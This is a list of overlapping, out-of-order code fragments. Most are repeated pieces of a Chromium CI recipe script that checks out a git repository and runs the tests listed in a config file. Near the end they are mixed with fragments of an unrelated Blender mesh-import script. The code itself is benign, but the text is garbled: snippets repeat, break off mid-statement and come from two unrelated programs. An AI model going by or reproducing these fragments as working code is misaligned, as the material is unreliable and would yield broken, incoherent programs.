"'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties.",
"l.split() if cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else:",
"in sorted(tests): name = 'test: %s' % l cmd = l.split() if cmd[0]",
"checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert",
"} def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage ==",
"patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository url and refspec must",
"recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES =",
"Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { #",
"script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', )",
"param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage,",
"given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git",
"cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver(",
"<filename>scripts/slave/recipes/simple_ci.py # Copyright 2016 The Chromium Authors. All rights reserved. # Use of",
"jobs properties. 'repository': Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec':",
"url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'),",
"'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch properties. 'patch_storage':",
"'--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f:",
"repo_url and refspec, 'repository url and refspec must be given' assert repo_url.startswith('https://') api.step('git",
"as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests =",
"'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch properties.",
"l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name = 'test: %s' %",
"api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch',",
"New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None),",
"help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if",
"assert repo_url and refspec, 'repository url and refspec must be given' assert repo_url.startswith('https://')",
"\"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args')))",
"patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str,",
"def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra',",
"args'))) tests = [] for l in result.stdout.splitlines(): l = l.strip() if l",
"repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra',",
"[] for l in result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'):",
"'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git',",
"f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = []",
"and patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository",
"Authors. All rights reserved. # Use of this source code is governed by",
"'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline(",
"'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' %",
"'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a",
"] PROPERTIES = { # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url':",
"2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties(",
"default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str,",
"file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ]",
"'--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout',",
"The Chromium Authors. All rights reserved. # Use of this source code is",
"Use of this source code is governed by a BSD-style license that can",
"api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests',",
"['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout',",
"Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository':",
"'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with",
"found in the LICENSE file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties',",
"# Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a Git repository', default=None,",
"tests = [] for l in result.stdout.splitlines(): l = l.strip() if l and",
"default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs",
"refspec = patch_ref assert repo_url and refspec, 'repository url and refspec must be",
"Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref):",
"must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset',",
"api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive'])",
"Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch",
"'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full",
"in the LICENSE file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python',",
"'repository url and refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init'])",
"= { # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None),",
"PROPERTIES = { # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str,",
"stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for l in",
"to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage:",
"repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url,",
"% l cmd = l.split() if cmd[0] == 'python' and len(cmd) >= 2:",
"code is governed by a BSD-style license that can be # found in",
"to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), }",
"if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url",
"gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' ) + api.override_step_data('test: ./a.sh', retcode=1)",
"rights reserved. # Use of this source code is governed by a BSD-style",
"open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests",
"api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') +",
"that can be # found in the LICENSE file. from recipe_engine.recipe_api import Property",
"and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name = 'test:",
"== 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def",
"l in result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'): tests.append(l) with",
"tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output(",
"refspec, 'repository url and refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git',",
"c.py args'))) tests = [] for l in result.stdout.splitlines(): l = l.strip() if",
"else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try')",
"'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api):",
"f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for l",
"repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit' assert patch_repository_url",
"checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result",
"= [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New Gerrit",
"assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url and",
"repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git',",
"== 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref assert",
"and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield",
"tests.append(l) with api.step.defer_results(): for l in sorted(tests): name = 'test: %s' % l",
"All rights reserved. # Use of this source code is governed by a",
"= [] for l in result.stdout.splitlines(): l = l.strip() if l and not",
"by a BSD-style license that can be # found in the LICENSE file.",
"yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' )",
"refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git reset', ['git',",
"with api.step.defer_results(): for l in sorted(tests): name = 'test: %s' % l cmd",
"'recipe_engine/step', ] PROPERTIES = { # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None),",
"'update', '--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg')",
"properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None),",
"'repository': Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec",
"the LICENSE file. from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io',",
"patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository url",
"is governed by a BSD-style license that can be # found in the",
"refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init',",
"a BSD-style license that can be # found in the LICENSE file. from",
"Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'),",
"Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to",
"update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests', # Multiplatform",
"l = l.strip() if l and not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l",
"sorted(tests): name = 'test: %s' % l cmd = l.split() if cmd[0] ==",
"= l.split() if cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:])",
"Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython",
"name = 'test: %s' % l cmd = l.split() if cmd[0] == 'python'",
"= patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository url and refspec",
"# New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url': Property(kind=str,",
"not l.startswith('#'): tests.append(l) with api.step.defer_results(): for l in sorted(tests): name = 'test: %s'",
"governed by a BSD-style license that can be # found in the LICENSE",
"{ # New Gerrit patch properties. 'patch_storage': Property(kind=str, default=None), 'patch_gerrit_url': Property(kind=str, default=None), 'patch_repository_url':",
"reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git",
"default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to",
"repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git',",
"reserved. # Use of this source code is governed by a BSD-style license",
">= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') +",
"and refspec, 'repository url and refspec must be given' assert repo_url.startswith('https://') api.step('git init',",
"# Use of this source code is governed by a BSD-style license that",
"2016 The Chromium Authors. All rights reserved. # Use of this source code",
"= 'test: %s' % l cmd = l.split() if cmd[0] == 'python' and",
"'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url",
"Copyright 2016 The Chromium Authors. All rights reserved. # Use of this source",
"from recipe_engine.recipe_api import Property DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES",
"len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci')",
"\"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py",
"api.raw_io.test_api.stream_output( './a.sh\\npython b.py\\npython c.py args'))) tests = [] for l in result.stdout.splitlines(): l",
"api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' ) +",
"submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result = api.python.inline( 'read tests', #",
"args=cmd[2:]) else: api.step(name, cmd) def GenTests(api): yield api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield",
"license that can be # found in the LICENSE file. from recipe_engine.recipe_api import",
"can be # found in the LICENSE file. from recipe_engine.recipe_api import Property DEPS",
"'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url,",
"Chromium Authors. All rights reserved. # Use of this source code is governed",
"= patch_ref assert repo_url and refspec, 'repository url and refspec must be given'",
"'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update',",
"'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda:",
"for l in result.stdout.splitlines(): l = l.strip() if l and not l.startswith('#'): tests.append(l)",
"cmd = l.split() if cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1],",
"# Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(), step_test_data=(lambda: api.raw_io.test_api.stream_output( './a.sh\\npython",
"['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule",
"['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update', '--init', '--recursive']) result =",
"l cmd = l.split() if cmd[0] == 'python' and len(cmd) >= 2: api.python(name,",
"patch_storage == 'gerrit' assert patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref",
"be # found in the LICENSE file. from recipe_engine.recipe_api import Property DEPS =",
"# Copyright 2016 The Chromium Authors. All rights reserved. # Use of this",
"repo_url = patch_repository_url refspec = patch_ref assert repo_url and refspec, 'repository url and",
"b.py\\npython c.py args'))) tests = [] for l in result.stdout.splitlines(): l = l.strip()",
"for l in sorted(tests): name = 'test: %s' % l cmd = l.split()",
"patch_repository_url and patch_ref repo_url = patch_repository_url refspec = patch_ref assert repo_url and refspec,",
"url and refspec must be given' assert repo_url.startswith('https://') api.step('git init', ['git', 'init']) api.step('git",
"% refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD']) api.step('git submodule update', ['git', 'submodule', 'update',",
"api.python.inline( 'read tests', # Multiplatform \"cat\" \"with open('infra/config/ci.cfg') as f: print f.read()\", stdout=api.raw_io.output_text(),",
"# found in the LICENSE file. from recipe_engine.recipe_api import Property DEPS = [",
"api.step('git fetch', ['git', 'fetch', repo_url, '%s' % refspec]) api.step('git checkout', ['git', 'checkout', 'FETCH_HEAD'])",
"properties. 'repository': Property(kind=str, help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str,",
"init', ['git', 'init']) api.step('git reset', ['git', 'reset', '--hard']) api.step('git fetch', ['git', 'fetch', repo_url,",
"cmd[0] == 'python' and len(cmd) >= 2: api.python(name, script=cmd[1], args=cmd[2:]) else: api.step(name, cmd)",
"default='master'), } def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage",
"default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a Git repository',",
"api.test('ci') + api.properties( repository='https://chromium.googlesource.com/infra/infra', ) yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all')",
"Property(kind=str, default=None), 'patch_ref': Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url",
"Property(kind=str, default=None), # Non-patch jobs properties. 'repository': Property(kind=str, help='Full url to a Git",
"DEPS = [ 'recipe_engine/properties', 'recipe_engine/python', 'recipe_engine/raw_io', 'recipe_engine/step', ] PROPERTIES = { # New",
") yield api.test('cq_try') + api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52'",
"def RunSteps(api, repo_url, refspec, patch_storage, patch_repository_url, patch_ref): if patch_storage: assert patch_storage == 'gerrit'",
"help='Full url to a Git repository', default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout',",
"+ api.properties.tryserver( gerrit_project='infra/infra', ) yield api.test('ci_fail_but_run_all') + api.properties( repository='https://chromium.googlesource.com/infra/infra', refspec='release-52' ) + api.override_step_data('test:",
"default=None, param_name='repo_url'), 'refspec': Property(kind=str, help='Refspec to checkout', default='master'), } def RunSteps(api, repo_url, refspec,"
] |
[
"def get_bl_edges(se3_vertex_indices): edges = [] num_of_indices = len(se3_vertex_indices) last_index = num_of_indices - 1",
"se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for face_edge in",
"layer.vertex_maps_append(map) file_query.follows_block_end_decl() #close vertex map block file_query.follows_block_end_decl() #close vertex maps block num_of_verts =",
"context): from mathutils import (Matrix, Vector) import math filepath = operator.filepath se3_mesh =",
"1.0))) obj = bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps",
"= get_se3_mesh_form_file(filepath) for se3_layer in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges",
"last_value_idx: is_last_value = True poly.append(file_query.get_vert_idx(is_last_value)) processed_values += 1 file_query.follows_block_end_decl() #close polygon block layer.polygons.append(tuple(poly))",
"se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for i in",
"real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data =",
"= mesh.polygons[face_index] for j, k in enumerate(poly.loop_indices): uv_loop.data[k].uv = real_tex_face[j] tranf_mat = Matrix(((-1.0,",
"layer_name = file_query.get_str_value(\"LAYER_NAME\") layer_index = file_query.get_long_value(\"LAYER_INDEX\") file_query.follows_block_begin_decl() #open layer block layer = se3.Layer(layer_name,",
"edges.append(face_edge) if is_fgon_edge: fgon_edge_indices.append(edge_index_count) edge_index_count += 1 faces = [real_face[0] for real_face in",
"map_smoothing_angle) processed_poly_idxs = 0 while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl()",
"#close layer block processed_layers += 1 file_query.follows_block_end_decl() #close layers block return mesh def",
"0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle =",
"idx, uv_data in enumerate(uvs_data): try: data = real_face[1][idx][real_index] except: data = (1,0) uv_data.append(data)",
"num_of_weight_maps += 1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems =",
"= len(se3_polygon) se3_is_tri_or_quad = se3_num_of_vertex_indices <= 4 se3_surface_map_index = se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index)",
"file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh = se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl()",
"from . import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version = file_query.get_num_value(\"SE_MESH\") mesh",
"= False last_value_idx = num_of_values - 1 while processed_values < num_of_values: if processed_values",
"enumerate(se3_layer.surface_maps): for polygon_index in se3_surface_map.polygons: se3_surface_map_indices[polygon_index] = se3_surface_map_index edge_index_count = 0 for se3_polygon_index,",
"return True def get_bl_face_uv_data(real_face, bl_face): num_of_uv_tex = len(real_face[1]) uvs_data = [] for i",
"processed_maps = 0 num_of_texcoord_maps = 0 num_of_weight_maps = 0 num_of_morph_maps = 0 while",
"1.0, 0.0), ( 0.0, 1.0, 0.0, 0.0), ( 0.0, 0.0, 0.0, 1.0))) obj",
"1 map = se3.VertexMap(map_type, map_name, map_is_relative) map.type_index = type_index num_of_map_elems = file_query.get_long_value(\"ELEMENTS\") file_query.follows_block_begin_decl()",
"vert_index in bl_face: real_index = real_face[0].index(vert_index) for idx, uv_data in enumerate(uvs_data): try: data",
"= se3_layer.vertices if se3_non_basic_morph_map: obj.shape_key_add(\"position\") shape_keys = [] for se3_other_mmap in se3_non_basic_morph_map: shape_keys.append(obj.shape_key_add(se3_other_mmap.name))",
"se3_surface_map_indices[se3_polygon_index] if se3_is_tri_or_quad: material_indices.append(se3_surface_map_index) face = get_bl_face(se3_layer, se3_polygon) real_faces.append(face) face_edges = get_bl_edges(face[0]) for",
"while num_of_processed_pointers < num_of_pointers: if num_of_processed_pointers == last_pointer_index: is_last_pointer = True vertex_data_pointer =",
"se3_surface_map_index edge_index_count = 0 for se3_polygon_index, se3_polygon in enumerate(se3_layer.polygons): se3_num_of_vertex_indices = len(se3_polygon) se3_is_tri_or_quad",
"1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon) bound_edges =",
"se3_layer.vertex_maps[other_mp[0]].type_index se3_disp = se3_layer.vertex_maps[other_mp[0]].elements[other_mp[1]] se3_vert = se3_vertex.basic_morph_pointer[1] vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co",
"vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices: se3_weight_pointers",
"= [] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces = [] se3_surface_map_indices =",
"file_query.get_map_type(False) map_name = file_query.get_map_name() map_smoothing_angle = file_query.get_num_value(\"POLYGON_MAP_SMOOTHING_ANGLE\") polygon_count = file_query.get_long_value(\"POLYGONS_COUNT\") file_query.follows_block_begin_decl() #open polygon",
"get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1 elif map_type == se3.VERTEX_MAP_TYPE_TEXCOORD:",
"se3_weight_pointer in se3_weight_pointers: vertex_index = se3_vertex.basic_morph_pointer[1] se3_vertex_map_index = se3_weight_pointer[0] se3_vertex_weight = se3_layer.vertex_maps[se3_vertex_map_index].elements[se3_weight_pointer[1]] vertex_group_index",
"vert_data = se3_layer.vertex_maps[se3_vertex.basic_morph_pointer[0]].elements[se3_vertex.basic_morph_pointer[1]] shape_keys[type_idx - 1].data[se3_vert].co = Vector(vert_data) + Vector(se3_disp) se3_weight_maps = se3_layer.weight_maps",
"se3_weight_maps: vertex_groups = [] for se3_weight_map in se3_weight_maps: vertex_groups.append(obj.vertex_groups.new(se3_weight_map.name)) for se3_vertex in se3_vertices:",
"se3_texcoord_maps = se3_layer.texcoord_maps for index in se3_vertex_indices: se3_vertex = se3_layer.vertices[index] new_indices.append(se3_vertex.basic_morph_pointer[1]) for uv_index,",
"in se3_mesh.layers: fgon_edge_indices = [] vertices = se3_layer.vertex_maps[0].elements edges = [] real_faces =",
"is_last_pointer = False last_pointer_index = num_of_pointers - 1 while num_of_processed_pointers < num_of_pointers: if",
"num_of_processed_vertices = 0 while num_of_processed_vertices < num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers",
"polygon maps block processed_poly_maps = 0 while processed_poly_maps < num_of_poly_maps: map_type = file_query.get_map_type(False)",
"bpy.data.objects.new(se3_layer.name, mesh) context.collection.objects.link(obj) context.view_layer.objects.active = obj obj.select_set(True) se3_non_basic_morph_map = se3_layer.non_basic_morph_maps se3_vertices = se3_layer.vertices",
"se3.VERTEX_MAP_TYPE_MORPH: type_index = num_of_morph_maps get_map_elem = file_query.get_morph_elem map_is_relative = file_query.get_bool_value(\"RELATIVE\") num_of_morph_maps += 1",
"def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data = [] for",
"edge_index_count += 1 \"\"\" edges.append(face_edge) edge_index_count += 1 else: ngon_face = get_bl_face(se3_layer, se3_polygon)",
"= se3.Mesh(version) num_of_layers = file_query.get_num_value(\"LAYERS\") file_query.follows_block_begin_decl() #open layers block processed_layers = 0 while",
"poly = [] file_query.follows_block_begin_decl() #open polygon block num_of_values = file_query.get_num_of_values() processed_values = 0",
"< num_of_verts: vertex = se3.Vertex() morph_pointers = vertex.morph_pointers weight_pointers = vertex.weight_pointers uv_pointers =",
"bpy_extras.mesh_utils import ngon_tessellate from . import se3 def get_se3_mesh_form_file(filepath): file_query = se3.ASCIIFileQuery(filepath) version",
"block return mesh def get_bl_face(se3_layer, se3_vertex_indices): new_indices = [] num_of_texcoord_maps = len(se3_layer.texcoord_maps) uvs_data",
"= file_query.get_long_value(\"POLYGON_MAPS\") file_query.follows_block_begin_decl() #open polygon maps block processed_poly_maps = 0 while processed_poly_maps <",
"for fgon_face in fgon_faces: material_indices.append(se3_surface_map_index) real_faces.append(tuple( [fgon_face, get_bl_face_uv_data(ngon_face, fgon_face)] )) face_edges = get_bl_edges(fgon_face)",
"num_of_weight_maps = 0 num_of_morph_maps = 0 while processed_maps < num_of_maps: map_type = file_query.get_map_type()",
"vertex_map_type == se3.VERTEX_MAP_TYPE_TEXCOORD: uv_pointers.append(vertex_data_pointer) num_of_processed_pointers += 1 layer.vertices.append(vertex) file_query.follows_block_end_decl() #close vertex block num_of_processed_vertices",
"se3.Layer(layer_name, layer_index) mesh.layers.append(layer) num_of_maps = file_query.get_long_value(\"VERTEX_MAPS\") file_query.follows_block_begin_decl() #open vertex maps block processed_maps =",
"while processed_poly_idxs < polygon_count: poly_map.polygons.append(file_query.get_poly_idx()) processed_poly_idxs += 1 file_query.follows_block_end_decl() #close polygon count block",
"edge in edges: edge_rev = (edge[0], edge[1]) if which_edge == edge or which_edge",
